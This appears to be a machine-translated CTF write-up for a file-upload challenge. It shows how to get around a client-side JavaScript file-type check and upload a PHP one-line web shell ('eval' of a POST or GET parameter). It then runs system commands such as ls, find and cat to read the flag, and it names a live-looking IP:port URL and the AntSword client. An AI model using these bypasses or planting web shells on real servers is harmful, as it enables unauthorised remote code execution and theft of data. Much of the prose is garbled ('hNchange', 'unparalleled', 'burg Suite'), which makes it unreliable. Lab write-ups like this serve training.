Open the topic address:

is a question uploaded by a file
Select a sentence of a sentence:

The

front end exists in the JS code check file type. If the uploaded file suffix is not JPG and PNG, it will make the upload button unable to enable:

to bypass the JS code check at the front end. The common methods are:

You can directly put hNchange = “Check (); remove it, so that the file type will not be verified when submitting the file.
F12 View page code:

Delete h native = “check ();

After finding the 1.PHP file, the file suffix was still verified, so that the upload button became unparalleled:

But delete ο nchange = “check () in the Firefox browser; after that, it can be uploaded 1.php file:

Click to upload:

Uploaded successfully!

So Google browser may need to delete the entire JS code, then we simply choose 1.php file:

Remove the Disable attribute of the upload button:

After

, the upload button becomes capable, upload 1.php:

Uploaded successfully!

The JS script of the browser is disabled, so that the file type will not be verified when submitting the file.
For example, Google browser, in advanced settings-> privacy settings and security-> javascript, or directly enter the URL:

chrome://settings/content/javascript

JavaScript is not allowed to be allowed to temporarily set all websites or specify the target URL cannot execute the JavaScript script.
Select 1.php: PHP:

No JS script, the upload button is still enable, you can upload directly:

Uploaded successfully!

first, select 11.jpg upload from the browser, and then burg Suite to catch the package:

After

, send it to the retake device, change 11.jpg back to 11.php and then send:

can also be uploaded successfully.

<?php @eval($_POST['attack']); ?>

The principle of Trojan in one sentence, the value of the Attack variable submitted by the POST method through the EVAL function of the PHP is to perform the Attack = xxx string as a phpite statement. The Attack here is only a variable name, and it can be changed to others.
This sentence Trojan needs to submit the value of the ATTACK variable in a post:

attack=phpinfo();

phpinfo () output a large amount of information in the current state of PHP, including PHP compilation options, enabled expansion, PHP version, server information and environment variables (if compiled as a module), PHP environment variable, operating system version information, PATH Local values and main values of variables, configuration options, HTTP header and PHP authorization information (License).

After
, we can execute the command of the file in the current directory:

After

attack=system('ls');

, search for FLAG files:

attack=system('find / -name "flag*" ');

Discover FLAG under /var/www/html/flag.php: Flag:
View Flag file:

attack=system('cat /var/www/html/flag.php');

The content of Flag.php files returned in the comment and get FLAG:cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}

<?php @eval($_GET[‘attack’]); ?>

One sentence Trojan can also submit the value of the ATTACK variable through a get.
Upload a 2.php

After

, connect:

http://111.200.241.244:54118/upload/1637599461.2.php?attack=system('cat /var/www/html/flag.php');

Get Flag:cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}

In addition, you can also connect with ant sword:

<?php @eval($_POST['attack']); ?>

to connect a sentence of the first post mode: Trojan:

After

, you can use virtual terminals, view file management, perform database operations, etc.:

Find flag.php:

get FLAG:cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}